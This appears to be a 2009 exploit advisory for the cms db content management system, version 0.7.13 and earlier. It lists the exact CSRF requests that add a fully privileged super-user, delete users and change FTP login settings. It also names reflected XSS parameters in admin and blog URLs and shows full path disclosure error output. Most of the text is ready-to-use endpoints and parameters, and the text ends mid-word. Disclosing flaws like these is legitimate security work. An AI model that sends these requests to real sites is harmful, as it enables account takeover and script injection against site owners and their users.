1 # Author: cp77fk4r | Empty0pagE[SHIFT+2]Gmail.com
2 # Software Link: [http://cms−db.de/download]
3 # Version: [cms −db <= v0.7.13]
4 #
5 #
6 # [CSRF]
7 −Add super−user: <POST>
8 URL:
9 /cms/admin/newuser.php
10 #
11 PARAMS: <POST>
12 user=[USER_NAME]&pass=[PASSWORD]&repeat=[PASSWORD]&pages=on&files=on&includes=on&template=on&gbook=on&blog=on&stats=o
n&button=Save
13 #
14 −Delete user: <GET&POST>
15 USR:
16 http://[SITE_URL]/admin/deluser.php
17 #
18 PARAMS: <GET>
19 user=[USER_ID].php
20 #
21 PARAMS: <POST>
22 user=[USER_ID].php&button=Yes
23 #
24 −Set ftp server login: <POST>
25 URL:
26 /cms/admin/ftpsettings.php
27 #
28 PARAMS: <POST>
29 ftpserver=localhost&ftpuser=[USERNAME]&ftppw=[PASSWORD]&ftpdir=%2F&button=Save
30 #
31 #
32 # [XSS]
33 http://[SITE_URL]/admin/index.php?locale=[XSS]
34 http://[SITE_URL]/blogfeed.php?l=[XSS]
35 http://[SITE_URL]/admin/users.php?saved=[XSS] <Login required>
36 #
37 #
38 # [Full Path Disclosure]
39 Fatal errorz:
40 URL:
41 http://[SITE_URL]/gb.php
42 Fatal error: Call to a member function addToHead() on a non−object
43 in [Full Path] on line 13
44 #
45 http://[SITE_URL]/contact.php
46 Fatal error: Class ’LocalizingClass’ not found in [Full
47 Path]/contact.php on line 3
48 #
49 http://[SITE_URL]/blog.php
50 Fatal error: Class ’LocalizingClass’ not found in [Full
51 Path]/blog.php on line 7
Page 1/2
cms db v0.7.13 Multiple Vulnerabilities
cp77fk4r
12/25/2009
52 #
53 Warning:
54 http://[SITE_URL]/functions_url.inc.php
55 Warning: include() [function.include]: Unable to access
56 ../data/settings/url.inc.php in [Full Path]/functions_url.inc.php on
57 line 10
58 Warning: include(../data/settings/url.inc.php) [function.include]:
59 failed to open stream: No such file or directory in [Full
60 Path]/functions_url.inc.php on line 10
61 Warning: include() [function.include]: Unable to access
62 ../data/settings/url.inc.php in [Full Path]/functions_url.inc.php on
63 line 10
64 Warning: include(../data/settings/url.inc.php) [function.include]:
65 failed to open stream: No such file or di